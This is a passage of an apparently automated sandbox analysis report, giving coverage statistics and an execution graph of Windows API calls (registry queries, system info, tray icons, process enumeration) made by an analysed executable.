                                                          • Instruction Fuzzy Hash: 1AF06235105558EFC7019FA5DD0499F7BA8EF56350B2540AAE840E7311D634DE019FA9

                                                          Execution Graph

                                                          Execution Coverage:3.8%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.4%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:113
                                                          execution_graph 97521 5b107d 97526 5c2fc5 97521->97526 97523 5b108c 97557 5d2f70 97523->97557 97527 5c2fd5 __ftell_nolock 97526->97527 97560 5c1207 97527->97560 97531 5c3094 97572 5d08c1 97531->97572 97538 5c1207 59 API calls 97539 5c30c5 97538->97539 97591 5c19e1 97539->97591 97541 5c30ce RegOpenKeyExW 97542 6001a3 RegQueryValueExW 97541->97542 97546 5c30f0 Mailbox 97541->97546 97543 6001c0 97542->97543 97544 600235 RegCloseKey 97542->97544 97595 5d0fe6 97543->97595 97544->97546 97556 600247 _wcscat Mailbox __NMSG_WRITE 97544->97556 97546->97523 97547 6001d9 97605 5c433f 97547->97605 97550 600201 97608 5c1821 97550->97608 97552 60021b 97552->97544 97553 5c1609 59 API calls 97553->97556 97555 5c4c94 59 API calls 97555->97556 97556->97546 97556->97553 97556->97555 97617 5c1a36 97556->97617 97688 5d2e74 97557->97688 97559 5b1096 97561 5d0fe6 Mailbox 59 API calls 97560->97561 97562 5c1228 97561->97562 97563 5d0fe6 Mailbox 59 API calls 97562->97563 97564 5c1236 97563->97564 97565 5d00cf 97564->97565 97621 5e1b70 97565->97621 97568 5c1a36 59 API calls 97569 5d0102 97568->97569 97623 5d0284 97569->97623 97571 5d010c Mailbox 97571->97531 97573 5e1b70 __ftell_nolock 97572->97573 97574 5d08ce GetFullPathNameW 97573->97574 97575 5d08f0 97574->97575 97576 5c1821 59 API calls 97575->97576 97577 5c309f 97576->97577 97578 5c1900 97577->97578 97579 5c1914 97578->97579 97580 5ff534 97578->97580 97645 5c18a5 97579->97645 97650 5c1c7e 59 API calls Mailbox 97580->97650 97583 5c191f 97585 5c4c94 97583->97585 97584 5ff53f __NMSG_WRITE _memmove 97586 5c4ca2 97585->97586 97590 5c4cc4 _memmove 97585->97590 97588 5d0fe6 Mailbox 59 API calls 97586->97588 97587 5d0fe6 Mailbox 59 API calls 97589 5c30bc 97587->97589 97588->97590 97589->97538 97590->97587 97592 5c19fb 97591->97592 97594 5c19ee 97591->97594 97593 5d0fe6 Mailbox 59 API calls 97592->97593 97593->97594 97594->97541 97599 5d0fee 97595->97599 97597 5d1008 97597->97547 97599->97597 97600 5d100c std::exception::exception 97599->97600 97652 5d593c 97599->97652 97669 5d35d1 DecodePointer 97599->97669 97670 5d87cb RaiseException 97600->97670 97602 5d1036 97671 5d8701 58 API calls _free 97602->97671 97604 5d1048 97604->97547 97606 5d0fe6 Mailbox 59 API calls 97605->97606 97607 5c4351 RegQueryValueExW 97606->97607 97607->97550 97607->97552 97609 5c182d __NMSG_WRITE 97608->97609 97610 5c189a 97608->97610 97612 5c1868 97609->97612 97613 5c1843 97609->97613 97611 5c1981 59 API calls 97610->97611 97616 5c184b _memmove 97611->97616 97687 5c1c7e 59 API calls Mailbox 97612->97687 97686 5c1b7c 59 API calls Mailbox 97613->97686 97616->97552 97618 5c1a45 __NMSG_WRITE _memmove 97617->97618 97619 5d0fe6 Mailbox 59 API calls 97618->97619 97620 5c1a83 97619->97620 97620->97556 97622 5d00dc GetModuleFileNameW 97621->97622 97622->97568 97624 5e1b70 __ftell_nolock 97623->97624 97625 5d0291 GetFullPathNameW 97624->97625 97626 5d02cd 97625->97626 97627 5d02b0 97625->97627 97628 5c19e1 59 API calls 97626->97628 97629 5c1821 59 API calls 97627->97629 97630 5d02bc 97628->97630 97629->97630 97633 5c133d 97630->97633 97634 5c134b 97633->97634 97637 5c1981 97634->97637 97636 5c135b 97636->97571 97638 5c198f 97637->97638 97640 5c1998 _memmove 97637->97640 97638->97640 97641 5c1aa4 97638->97641 97640->97636 97642 5c1ab4 _memmove 97641->97642 97643 5c1ab7 97641->97643 97642->97640 97644 5d0fe6 Mailbox 59 API calls 97643->97644 97644->97642 97646 5c18b4 __NMSG_WRITE 97645->97646 97648 5c18c5 _memmove 97646->97648 97651 5c1c7e 59 API calls Mailbox 97646->97651 97648->97583 97649 5ff4f1 _memmove 97650->97584 97651->97649 97653 5d59b7 97652->97653 97662 5d5948 97652->97662 97680 5d35d1 DecodePointer 97653->97680 97655 5d59bd 97681 5d8d58 58 API calls __getptd_noexit 97655->97681 97656 5d5953 97656->97662 97672 5da39b 58 API calls __NMSG_WRITE 97656->97672 97673 5da3f8 58 API calls 5 library calls 97656->97673 97674 5d32cf 97656->97674 97659 5d597b RtlAllocateHeap 97660 5d59af 97659->97660 97659->97662 97660->97599 97662->97656 97662->97659 97663 5d59a3 97662->97663 97667 5d59a1 97662->97667 97677 5d35d1 DecodePointer 97662->97677 97678 5d8d58 58 API calls __getptd_noexit 97663->97678 97679 5d8d58 58 API calls __getptd_noexit 97667->97679 97669->97599 97670->97602 97671->97604 97672->97656 97673->97656 97682 5d329b GetModuleHandleExW 97674->97682 97677->97662 97678->97667 97679->97660 97680->97655 97681->97660 97683 5d32cb ExitProcess 97682->97683 97684 5d32b4 GetProcAddress 97682->97684 97684->97683 97685 5d32c6 97684->97685 97685->97683 97686->97616 97687->97616 97689 5d2e80 _fprintf 97688->97689 97696 5d3447 97689->97696 97695 5d2ea7 _fprintf 97695->97559 97713 5d9e3b 97696->97713 97698 5d2e89 97699 5d2eb8 DecodePointer DecodePointer 97698->97699 97700 5d2ee5 97699->97700 97701 5d2e95 97699->97701 97700->97701 97758 5d89d4 59 API calls __mbsnbicoll_l 97700->97758 97710 5d2eb2 97701->97710 97703 5d2f48 EncodePointer EncodePointer 97703->97701 97704 5d2ef7 97704->97703 97705 5d2f1c 97704->97705 97759 5d8a94 61 API calls 2 library calls 97704->97759 97705->97701 97708 5d2f36 EncodePointer 97705->97708 97760 5d8a94 61 API calls 2 library calls 97705->97760 97708->97703 97709 5d2f30 97709->97701 97709->97708 97761 5d3450 97710->97761 97714 5d9e4c 97713->97714 97715 5d9e5f EnterCriticalSection 97713->97715 97720 5d9ec3 97714->97720 97715->97698 97717 5d9e52 97717->97715 97744 5d32e5 58 API calls 3 library calls 97717->97744 97721 5d9ecf _fprintf 97720->97721 97722 5d9ed8 97721->97722 97723 5d9ef0 97721->97723 97745 5da39b 58 API calls __NMSG_WRITE 97722->97745 97732 5d9f11 _fprintf 97723->97732 97747 5d8a4d 58 API calls 2 library calls 97723->97747 97726 5d9edd 97746 5da3f8 58 API calls 5 library calls 97726->97746 97728 5d9f05 97730 5d9f0c 97728->97730 97731 5d9f1b 97728->97731 97729 5d9ee4 97733 5d32cf __mtinitlocknum 3 API calls 97729->97733 97748 5d8d58 58 API calls __getptd_noexit 97730->97748 97735 5d9e3b __lock 58 API calls 97731->97735 97732->97717 97736 5d9eee 97733->97736 97737 5d9f22 97735->97737 97736->97723 97738 5d9f2f 97737->97738 97739 5d9f47 97737->97739 97749 5da05b InitializeCriticalSectionAndSpinCount 97738->97749 97750 5d2f85 97739->97750 97742 5d9f3b 97756 5d9f63 LeaveCriticalSection _doexit 97742->97756 97745->97726 97746->97729 97747->97728 97748->97732 97749->97742 97751 5d2f8e RtlFreeHeap 97750->97751 97755 5d2fb7 __dosmaperr 97750->97755 97752 5d2fa3 97751->97752 97751->97755 97757 5d8d58 58 API calls __getptd_noexit 97752->97757 97754 5d2fa9 GetLastError 97754->97755 97755->97742 97756->97732 97757->97754 97758->97704 97759->97705 97760->97709 97764 5d9fa5 LeaveCriticalSection 97761->97764 97763 5d2eb7 97763->97695 97764->97763 97765 5f01f8 97766 5f01fa 97765->97766 97769 614d18 SHGetFolderPathW 97766->97769 97770 5c1821 59 API calls 97769->97770 97771 5f0203 97770->97771 97772 5b1016 97777 5c5ce7 97772->97777 97775 5d2f70 __cinit 67 API calls 97776 5b1025 97775->97776 97778 5d0fe6 Mailbox 59 API calls 97777->97778 97779 5c5cef 97778->97779 97780 5b101b 97779->97780 97784 5c5f39 97779->97784 97780->97775 97785 5c5cfb 97784->97785 97786 5c5f42 97784->97786 97788 5c5d13 97785->97788 97787 5d2f70 __cinit 67 API calls 97786->97787 97787->97785 97789 5c1207 59 API calls 97788->97789 97790 5c5d2b GetVersionExW 97789->97790 97791 5c1821 59 API calls 97790->97791 97792 5c5d6e 97791->97792 97793 5c1981 59 API calls 97792->97793 97804 5c5d9b 97792->97804 97794 5c5d8f 97793->97794 97795 5c133d 59 API calls 97794->97795 97795->97804 97796 5c5e00 GetCurrentProcess IsWow64Process 97797 5c5e19 97796->97797 97799 5c5e2f 97797->97799 97800 5c5e98 GetSystemInfo 97797->97800 97798 601098 97812 5c55f0 97799->97812 97801 5c5e65 97800->97801 97801->97780 97804->97796 97804->97798 97805 5c5e8c GetSystemInfo 97807 5c5e56 97805->97807 97806 5c5e41 97808 5c55f0 2 API calls 97806->97808 97807->97801 97810 5c5e5c FreeLibrary 97807->97810 97809 5c5e49 GetNativeSystemInfo 97808->97809 97809->97807 97810->97801 97813 5c5619 97812->97813 97814 5c55f9 LoadLibraryA 97812->97814 97813->97805 97813->97806 97814->97813 97815 5c560a GetProcAddress 97814->97815 97815->97813 97816 5b1055 97821 5b2a19 97816->97821 97819 5d2f70 __cinit 67 API calls 97820 5b1064 97819->97820 97822 5c1207 59 API calls 97821->97822 97823 5b2a87 97822->97823 97828 5b1256 97823->97828 97825 5b2b24 97827 5b105a 97825->97827 97831 5b13f8 59 API calls 2 library calls 97825->97831 97827->97819 97832 5b1284 97828->97832 97831->97825 97833 5b1275 97832->97833 97834 5b1291 97832->97834 97833->97825 97834->97833 97835 5b1298 RegOpenKeyExW 97834->97835 97835->97833 97836 5b12b2 RegQueryValueExW 97835->97836 97837 5b12e8 RegCloseKey 97836->97837 97838 5b12d3 97836->97838 97837->97833 97838->97837 97839 5b5ff5 97862 5b5ede Mailbox _memmove 97839->97862 97840 5d0fe6 59 API calls Mailbox 97840->97862 97841 5b6a9b 98003 5ba9de 266 API calls 97841->98003 97844 5eeff9 98019 5b5190 59 API calls Mailbox 97844->98019 97846 5ef007 98020 61a48d 89 API calls 4 library calls 97846->98020 97848 5eefeb 97897 5b5569 Mailbox 97848->97897 98018 606cf1 59 API calls Mailbox 97848->98018 97851 5b60e5 97852 5ee137 97851->97852 97855 5b63bd Mailbox 97851->97855 97865 5b6abc 97851->97865 97882 5b6152 Mailbox 97851->97882 97852->97855 98004 607aad 59 API calls 97852->98004 97858 5d0fe6 Mailbox 59 API calls 97855->97858 97868 5b6426 97855->97868 97861 5b63d1 97858->97861 97859 5c1a36 59 API calls 97859->97862 97863 5b63de 97861->97863 97861->97865 97862->97840 97862->97841 97862->97844 97862->97846 97862->97851 97862->97859 97862->97865 97862->97897 97904 5b53b0 97862->97904 97959 62c355 97862->97959 98002 5b523c 59 API calls 97862->98002 98007 5c1c9c 97862->98007 98011 617f11 59 API calls Mailbox 97862->98011 98012 606cf1 59 API calls Mailbox 97862->98012 97866 5b6413 97863->97866 97867 5ee172 97863->97867 98017 61a48d 89 API calls 4 library calls 97865->98017 97866->97868 97895 5b5447 Mailbox 97866->97895 98005 62c87c 85 API calls 2 library calls 97867->98005 98006 62c9c9 95 API calls Mailbox 97868->98006 97872 5ee19d 97872->97872 97873 5ef165 98022 61a48d 89 API calls 4 library calls 97873->98022 97874 5ee691 98014 61a48d 89 API calls 4 library calls 97874->98014 97877 5b69fa 97886 5c1c9c 59 API calls 97877->97886 97880 5d0fe6 59 API calls Mailbox 97880->97895 97881 5ee6a0 97882->97848 97882->97865 97884 5ee2e9 VariantClear 97882->97884 97882->97897 97932 62e60c 97882->97932 97935 5bcfd7 97882->97935 97954 62f1b2 97882->97954 98001 5b5190 59 API calls Mailbox 97882->98001 98013 607aad 59 API calls 97882->98013 97883 5c1c9c 59 API calls 97883->97895 97884->97882 97885 5eea9a 97888 5c1c9c 59 API calls 97885->97888 97886->97897 97888->97897 97890 5b69ff 97890->97873 97890->97874 97891 5c1207 59 API calls 97891->97895 97892 5eeb67 97892->97897 98015 607aad 59 API calls 97892->98015 97894 607aad 59 API calls 97894->97895 97895->97874 97895->97877 97895->97880 97895->97883 97895->97885 97895->97890 97895->97891 97895->97892 97895->97894 97896 5d2f70 67 API calls __cinit 97895->97896 97895->97897 97898 5eef28 97895->97898 97900 5b5a1a 97895->97900 97999 5b7e50 266 API calls 2 library calls 97895->97999 98000 5b6e30 60 API calls Mailbox 97895->98000 97896->97895 98016 61a48d 89 API calls 4 library calls 97898->98016 98021 61a48d 89 API calls 4 library calls 97900->98021 97905 5b53cf 97904->97905 97927 5b53fd Mailbox 97904->97927 97906 5d0fe6 Mailbox 59 API calls 97905->97906 97906->97927 97907 5d2f70 67 API calls __cinit 97907->97927 97908 5b69fa 97909 5c1c9c 59 API calls 97908->97909 97928 5b5569 Mailbox 97909->97928 97910 5b69ff 97911 5ef165 97910->97911 97912 5ee691 97910->97912 98029 61a48d 89 API calls 4 library calls 97911->98029 98025 61a48d 89 API calls 4 library calls 97912->98025 97913 5c1207 59 API calls 97913->97927 97917 5d0fe6 59 API calls Mailbox 97917->97927 97918 5ee6a0 97918->97862 97919 5eea9a 97921 5c1c9c 59 API calls 97919->97921 97921->97928 97922 5c1c9c 59 API calls 97922->97927 97924 5eeb67 97924->97928 98026 607aad 59 API calls 97924->98026 97926 607aad 59 API calls 97926->97927 97927->97907 97927->97908 97927->97910 97927->97912 97927->97913 97927->97917 97927->97919 97927->97922 97927->97924 97927->97926 97927->97928 97929 5eef28 97927->97929 97931 5b5a1a 97927->97931 98023 5b7e50 266 API calls 2 library calls 97927->98023 98024 5b6e30 60 API calls Mailbox 97927->98024 97928->97862 98027 61a48d 89 API calls 4 library calls 97929->98027 98028 61a48d 89 API calls 4 library calls 97931->98028 98030 62d1c6 97932->98030 97934 62e61c 97934->97882 97936 5b4d37 84 API calls 97935->97936 97937 5bd001 97936->97937 98165 5b5278 97937->98165 97939 5bd018 97941 5bd57b 97939->97941 97948 5bd439 Mailbox __NMSG_WRITE 97939->97948 98195 5b502b 59 API calls 97939->98195 97941->97882 97943 5d0c65 62 API calls 97943->97948 97945 5b4f98 59 API calls 97945->97948 97948->97941 97948->97943 97948->97945 97949 5b4d37 84 API calls 97948->97949 97950 5c1821 59 API calls 97948->97950 97953 5b502b 59 API calls 97948->97953 98170 5d312d 97948->98170 98180 5c59d3 97948->98180 98191 5c5ac3 97948->98191 98196 5c162d 97948->98196 98201 5c153b 59 API calls 2 library calls 97948->98201 98202 5b4f3c 59 API calls Mailbox 97948->98202 97949->97948 97950->97948 97953->97948 97955 5b4d37 84 API calls 97954->97955 97956 62f1cf 97955->97956 98245 614148 CreateToolhelp32Snapshot Process32FirstW 97956->98245 97958 62f1de 97958->97882 97960 62c380 97959->97960 97961 62c39a 97959->97961 98293 61a48d 89 API calls 4 library calls 97960->98293 98266 62a8fd 97961->98266 97965 5b53b0 265 API calls 97966 62c406 97965->97966 97967 62c392 Mailbox 97966->97967 97968 62c498 97966->97968 97971 62c447 97966->97971 97967->97862 97969 62c4ee 97968->97969 97970 62c49e 97968->97970 97969->97967 97972 5b4d37 84 API calls 97969->97972 98294 617ed5 59 API calls 97970->98294 97977 61789a 59 API calls 97971->97977 97974 62c500 97972->97974 97975 5c1aa4 59 API calls 97974->97975 97978 62c524 CharUpperBuffW 97975->97978 97976 62c4c1 98295 5c35b9 59 API calls Mailbox 97976->98295 97980 62c477 97977->97980 97983 62c53e 97978->97983 97982 606ebc 265 API calls 97980->97982 97981 62c4c9 Mailbox 98296 5bb020 97981->98296 97982->97967 97984 62c591 97983->97984 97987 62c545 97983->97987 97986 5b4d37 84 API calls 97984->97986 97988 62c599 97986->97988 98273 61789a 97987->98273 98338 5b5376 60 API calls 97988->98338 97993 62c5a3 97993->97967 97994 5b4d37 84 API calls 97993->97994 97995 62c5be 97994->97995 98339 5c35b9 59 API calls Mailbox 97995->98339 97997 62c5ce 97998 5bb020 265 API calls 97997->97998 97998->97967 97999->97895 98000->97895 98001->97882 98002->97862 98003->97865 98004->97855 98005->97868 98006->97872 98008 5c1caf 98007->98008 98009 5c1ca7 98007->98009 98008->97862 98651 5c1bcc 59 API calls 2 library calls 98009->98651 98011->97862 98012->97862 98013->97882 98014->97881 98015->97897 98016->97900 98017->97848 98018->97897 98019->97848 98020->97848 98021->97897 98022->97897 98023->97927 98024->97927 98025->97918 98026->97928 98027->97931 98028->97928 98029->97928 98068 5b4d37 98030->98068 98034 62d4a2 98035 62d617 98034->98035 98039 62d4b0 98034->98039 98137 62dfb1 92 API calls Mailbox 98035->98137 98038 62d626 98038->98039 98041 62d632 98038->98041 98099 62d057 98039->98099 98040 5b4d37 84 API calls 98059 62d29b Mailbox 98040->98059 98051 62d24a Mailbox 98041->98051 98046 62d4e9 98114 5d0e38 98046->98114 98049 62d503 98121 61a48d 89 API calls 4 library calls 98049->98121 98050 62d51c 98122 5b47be 98050->98122 98051->97934 98054 62d50e GetCurrentProcess TerminateProcess 98054->98050 98059->98034 98059->98040 98059->98051 98119 61fc0d 59 API calls 2 library calls 98059->98119 98120 62d6c8 61 API calls 2 library calls 98059->98120 98060 62d68d 98060->98051 98064 62d6a1 FreeLibrary 98060->98064 98061 62d554 98134 62dd32 107 API calls _free 98061->98134 98064->98051 98065 62d565 98065->98060 98135 5b4230 59 API calls Mailbox 98065->98135 98136 5b523c 59 API calls 98065->98136 98138 62dd32 107 API calls _free 98065->98138 98069 5b4d51 98068->98069 98078 5b4d4b 98068->98078 98070 5b4d99 98069->98070 98071 5b4d57 __itow 98069->98071 98075 5edb28 __i64tow 98069->98075 98077 5eda2f 98069->98077 98139 5d38c8 83 API calls 3 library calls 98070->98139 98074 5d0fe6 Mailbox 59 API calls 98071->98074 98076 5b4d71 98074->98076 98076->98078 98080 5c1a36 59 API calls 98076->98080 98079 5d0fe6 Mailbox 59 API calls 98077->98079 98084 5edaa7 Mailbox _wcscpy 98077->98084 98078->98051 98086 62de8e 98078->98086 98081 5eda74 98079->98081 98080->98078 98082 5d0fe6 Mailbox 59 API calls 98081->98082 98083 5eda9a 98082->98083 98083->98084 98085 5c1a36 59 API calls 98083->98085 98140 5d38c8 83 API calls 3 library calls 98084->98140 98085->98084 98087 5c1aa4 59 API calls 98086->98087 98088 62dea9 CharLowerBuffW 98087->98088 98141 60f903 98088->98141 98092 5c1207 59 API calls 98093 62dee2 98092->98093 98148 5c1462 59 API calls 2 library calls 98093->98148 98095 62def9 98096 5c1981 59 API calls 98095->98096 98097 62df05 Mailbox 98096->98097 98098 62df41 Mailbox 98097->98098 98149 62d6c8 61 API calls 2 library calls 98097->98149 98098->98059 98100 62d072 98099->98100 98101 62d0c7 98099->98101 98102 5d0fe6 Mailbox 59 API calls 98100->98102 98105 62e139 98101->98105 98104 62d094 98102->98104 98103 5d0fe6 Mailbox 59 API calls 98103->98104 98104->98101 98104->98103 98106 62e362 Mailbox 98105->98106 98113 62e15c _strcat _wcscpy __NMSG_WRITE 98105->98113 98106->98046 98107 5b50d5 59 API calls 98107->98113 98108 5b502b 59 API calls 98108->98113 98109 5b5087 59 API calls 98109->98113 98110 5b4d37 84 API calls 98110->98113 98111 5d593c 58 API calls __crtCompareStringA_stat 98111->98113 98113->98106 98113->98107 98113->98108 98113->98109 98113->98110 98113->98111 98152 615e42 61 API calls 2 library calls 98113->98152 98115 5d0e4d 98114->98115 98116 5d0ee5 SetErrorMode 98115->98116 98117 5d0ed3 FindCloseChangeNotification 98115->98117 98118 5d0eb3 98115->98118 98116->98118 98117->98118 98118->98049 98118->98050 98119->98059 98120->98059 98121->98054 98123 5b47c6 98122->98123 98124 5d0fe6 Mailbox 59 API calls 98123->98124 98125 5b47d4 98124->98125 98126 5b47e0 98125->98126 98153 5b46ec 98125->98153 98128 5b4540 98126->98128 98156 5b4650 98128->98156 98130 5b454f 98131 5d0fe6 Mailbox 59 API calls 98130->98131 98132 5b45eb 98130->98132 98131->98132 98132->98065 98133 5b4230 59 API calls Mailbox 98132->98133 98133->98061 98134->98065 98135->98065 98136->98065 98137->98038 98138->98065 98139->98071 98140->98075 98142 60f92e __NMSG_WRITE 98141->98142 98143 60f96d 98142->98143 98146 60f963 98142->98146 98147 60fa14 98142->98147 98143->98092 98143->98097 98146->98143 98150 5c14db 61 API calls 98146->98150 98147->98143 98151 5c14db 61 API calls 98147->98151 98148->98095 98149->98098 98150->98146 98151->98147 98152->98113 98154 5d0fe6 Mailbox 59 API calls 98153->98154 98155 5b46f9 98154->98155 98155->98126 98157 5b4659 Mailbox 98156->98157 98158 5ed6ec 98157->98158 98163 5b4663 98157->98163 98159 5d0fe6 Mailbox 59 API calls 98158->98159 98161 5ed6f8 98159->98161 98160 5b466a 98160->98130 98163->98160 98164 5b5190 59 API calls Mailbox 98163->98164 98164->98163 98166 5d0fe6 Mailbox 59 API calls 98165->98166 98167 5b5285 98166->98167 98168 5b5294 98167->98168 98169 5c1a36 59 API calls 98167->98169 98168->97939 98169->98168 98171 5d31ae 98170->98171 98172 5d3139 98170->98172 98205 5d31c0 60 API calls 3 library calls 98171->98205 98179 5d315e 98172->98179 98203 5d8d58 58 API calls __getptd_noexit 98172->98203 98174 5d31bb 98174->97948 98176 5d3145 98204 5d8fe6 9 API calls __mbsnbicoll_l 98176->98204 98178 5d3150 98178->97948 98179->97948 98181 5c59fe _memset 98180->98181 98206 5c5800 98181->98206 98184 5c5a83 98186 5c5a9d Shell_NotifyIconW 98184->98186 98187 5c5ab9 Shell_NotifyIconW 98184->98187 98188 5c5aab 98186->98188 98187->98188 98210 5c56f8 98188->98210 98190 5c5ab2 98190->97948 98192 5c5b25 98191->98192 98193 5c5ad5 _memset 98191->98193 98192->97948 98194 5c5af4 Shell_NotifyIconW 98193->98194 98194->98192 98195->97948 98197 5d0fe6 Mailbox 59 API calls 98196->98197 98198 5c1652 98197->98198 98199 5d0fe6 Mailbox 59 API calls 98198->98199 98200 5c1660 98199->98200 98200->97948 98201->97948 98202->97948 98203->98176 98204->98178 98205->98174 98207 5c581c 98206->98207 98208 5c5810 98206->98208 98207->98208 98209 5c5821 DestroyIcon 98207->98209 98208->98184 98240 6134dd 62 API calls _W_store_winword 98208->98240 98209->98208 98211 5c57fa Mailbox 98210->98211 98212 5c5715 98210->98212 98211->98190 98213 5c162d 59 API calls 98212->98213 98214 5c5723 98213->98214 98215 600c4c LoadStringW 98214->98215 98216 5c5730 98214->98216 98219 600c66 98215->98219 98217 5c1821 59 API calls 98216->98217 98218 5c5745 98217->98218 98220 5c5752 98218->98220 98226 600c74 98218->98226 98221 5c1c9c 59 API calls 98219->98221 98220->98219 98222 5c5760 98220->98222 98227 5c5778 _memset _wcscpy 98221->98227 98223 5c1900 59 API calls 98222->98223 98224 5c576a 98223->98224 98241 5c17e0 59 API calls Mailbox 98224->98241 98226->98227 98228 5c1207 59 API calls 98226->98228 98229 600cb7 Mailbox 98226->98229 98230 5c57e0 Shell_NotifyIconW 98227->98230 98231 600c9e 98228->98231 98244 5d38c8 83 API calls 3 library calls 98229->98244 98230->98211 98242 610252 60 API calls Mailbox 98231->98242 98234 600ca9 98243 5c17e0 59 API calls Mailbox 98234->98243 98235 600cd6 98237 5c1900 59 API calls 98235->98237 98238 600ce7 98237->98238 98239 5c1900 59 API calls 98238->98239 98239->98227 98240->98184 98241->98227 98242->98234 98243->98229 98244->98235 98255 614ce2 98245->98255 98247 614195 Process32NextW 98248 614244 FindCloseChangeNotification 98247->98248 98249 61418e Mailbox 98247->98249 98248->97958 98249->98247 98249->98248 98250 5c1207 59 API calls 98249->98250 98251 5c1a36 59 API calls 98249->98251 98261 5d0119 59 API calls Mailbox 98249->98261 98262 5c17e0 59 API calls Mailbox 98249->98262 98263 5c151f 61 API calls 98249->98263 98250->98249 98251->98249 98256 614d09 98255->98256 98260 614cf0 98255->98260 98265 5d37c3 59 API calls __wcstoi64 98256->98265 98259 614d0f 98259->98249 98260->98256 98260->98259 98264 5d385c GetStringTypeW _iswctype 98260->98264 98261->98249 98262->98249 98263->98249 98264->98260 98265->98259 98267 62a918 98266->98267 98271 62a970 98266->98271 98268 5d0fe6 Mailbox 59 API calls 98267->98268 98272 62a93a 98268->98272 98269 5d0fe6 Mailbox 59 API calls 98269->98272 98271->97965 98272->98269 98272->98271 98340 60715b 59 API calls Mailbox 98272->98340 98274 6178ac 98273->98274 98276 6178e3 98273->98276 98275 5d0fe6 Mailbox 59 API calls 98274->98275 98274->98276 98275->98276 98277 606ebc 98276->98277 98278 606f06 98277->98278 98286 606f1c Mailbox 98277->98286 98279 5c1a36 59 API calls 98278->98279 98279->98286 98280 606f47 98282 62c355 266 API calls 98280->98282 98281 606f5a 98341 5ba820 98281->98341 98289 606f53 98282->98289 98285 607002 98285->97967 98286->98280 98286->98281 98287 606f91 98288 606fdc 98287->98288 98287->98289 98291 606fc1 98287->98291 98288->98289 98363 61a48d 89 API calls 4 library calls 98288->98363 98364 606cf1 59 API calls Mailbox 98289->98364 98358 60706d 98291->98358 98293->97967 98294->97976 98295->97981 98380 5c3740 98296->98380 98299 5f30b6 98469 61a48d 89 API calls 4 library calls 98299->98469 98301 5bb07f 98301->98299 98302 5f30d4 98301->98302 98323 5bbb86 98301->98323 98334 5bb132 Mailbox _memmove 98301->98334 98470 61a48d 89 API calls 4 library calls 98302->98470 98304 5f355e 98337 5bb4dd 98304->98337 98500 61a48d 89 API calls 4 library calls 98304->98500 98305 5f318a 98305->98337 98472 61a48d 89 API calls 4 library calls 98305->98472 98310 5f3106 98310->98305 98471 5ba9de 266 API calls 98310->98471 98313 5b3b31 59 API calls 98313->98334 98314 60730a 59 API calls 98314->98334 98315 5d0fe6 59 API calls Mailbox 98315->98334 98318 5b53b0 266 API calls 98318->98334 98319 5f3418 98320 5b53b0 266 API calls 98319->98320 98322 5f3448 98320->98322 98322->98337 98494 5b39be 98322->98494 98468 61a48d 89 API calls 4 library calls 98323->98468 98326 5f31c3 98473 61a48d 89 API calls 4 library calls 98326->98473 98327 5b3c30 68 API calls 98327->98334 98329 5f346f 98498 61a48d 89 API calls 4 library calls 98329->98498 98333 5b523c 59 API calls 98333->98334 98334->98304 98334->98310 98334->98313 98334->98314 98334->98315 98334->98318 98334->98319 98334->98323 98334->98326 98334->98327 98334->98329 98334->98333 98335 5c1c9c 59 API calls 98334->98335 98334->98337 98385 5b3add 98334->98385 98392 5bbc70 98334->98392 98466 5b3a40 59 API calls Mailbox 98334->98466 98467 5b5190 59 API calls Mailbox 98334->98467 98474 606c62 59 API calls 2 library calls 98334->98474 98475 62a9c3 85 API calls Mailbox 98334->98475 98476 606c1e 59 API calls Mailbox 98334->98476 98477 615ef2 68 API calls 98334->98477 98478 5b3ea3 98334->98478 98499 61a12a 59 API calls 98334->98499 98335->98334 98337->97967 98338->97993 98339->97997 98340->98272 98342 5f2d51 98341->98342 98345 5ba84c 98341->98345 98366 61a48d 89 API calls 4 library calls 98342->98366 98344 5f2d62 98344->98287 98346 5f2d6a 98345->98346 98353 5ba888 _memmove 98345->98353 98367 61a48d 89 API calls 4 library calls 98346->98367 98349 5d0fe6 59 API calls Mailbox 98349->98353 98350 5f2dae 98368 5ba9de 266 API calls 98350->98368 98351 5b53b0 266 API calls 98351->98353 98353->98349 98353->98350 98353->98351 98354 5f2dc8 98353->98354 98355 5ba975 98353->98355 98356 5ba962 98353->98356 98354->98355 98369 61a48d 89 API calls 4 library calls 98354->98369 98355->98287 98356->98355 98365 62a9c3 85 API calls Mailbox 98356->98365 98359 607085 98358->98359 98361 62f1b2 91 API calls 98359->98361 98370 62495b 98359->98370 98360 6070d9 98360->98289 98361->98360 98363->98289 98364->98285 98365->98355 98366->98344 98367->98355 98368->98354 98369->98355 98371 5d0fe6 Mailbox 59 API calls 98370->98371 98372 62496c 98371->98372 98373 5c433f 59 API calls 98372->98373 98374 624976 98373->98374 98375 5b4d37 84 API calls 98374->98375 98376 62498d GetEnvironmentVariableW 98375->98376 98379 617a51 59 API calls Mailbox 98376->98379 98378 6249aa 98378->98360 98379->98378 98381 5c374f 98380->98381 98384 5c376a 98380->98384 98382 5c1aa4 59 API calls 98381->98382 98383 5c3757 CharUpperBuffW 98382->98383 98383->98384 98384->98301 98386 5ed3cd 98385->98386 98387 5b3aee 98385->98387 98388 5d0fe6 Mailbox 59 API calls 98387->98388 98389 5b3af5 98388->98389 98390 5b3b16 98389->98390 98501 5b3ba5 59 API calls Mailbox 98389->98501 98390->98334 98393 5f359f 98392->98393 98403 5bbc95 98392->98403 98567 61a48d 89 API calls 4 library calls 98393->98567 98395 5bbf3b 98395->98334 98401 5bc2ca LockWindowUpdate DestroyWindow GetMessageW 98401->98395 98404 5bc2fc 98401->98404 98462 5bbca5 Mailbox 98403->98462 98568 5b5376 60 API calls 98403->98568 98569 60700c 266 API calls 98403->98569 98405 5f4509 TranslateMessage DispatchMessageW GetMessageW 98404->98405 98405->98395 98405->98405 98406 5f36b3 Sleep 98406->98462 98407 5b5376 60 API calls 98407->98462 98408 5f405d WaitForSingleObject 98413 5f407d GetExitCodeProcess CloseHandle 98408->98413 98408->98462 98409 5bbf54 timeGetTime 98409->98462 98410 5d0fe6 59 API calls Mailbox 98410->98462 98412 5bc210 Sleep 98447 5bc1fa Mailbox 98412->98447 98420 5bc36b 98413->98420 98414 5c1c9c 59 API calls 98414->98462 98415 5c1207 59 API calls 98415->98447 98417 5f43a9 Sleep 98417->98447 98418 5d083e timeGetTime 98418->98447 98420->98334 98421 5bc324 timeGetTime 98566 5b5376 60 API calls 98421->98566 98423 614148 66 API calls 98423->98447 98424 5f4440 GetExitCodeProcess 98426 5f446c CloseHandle 98424->98426 98427 5f4456 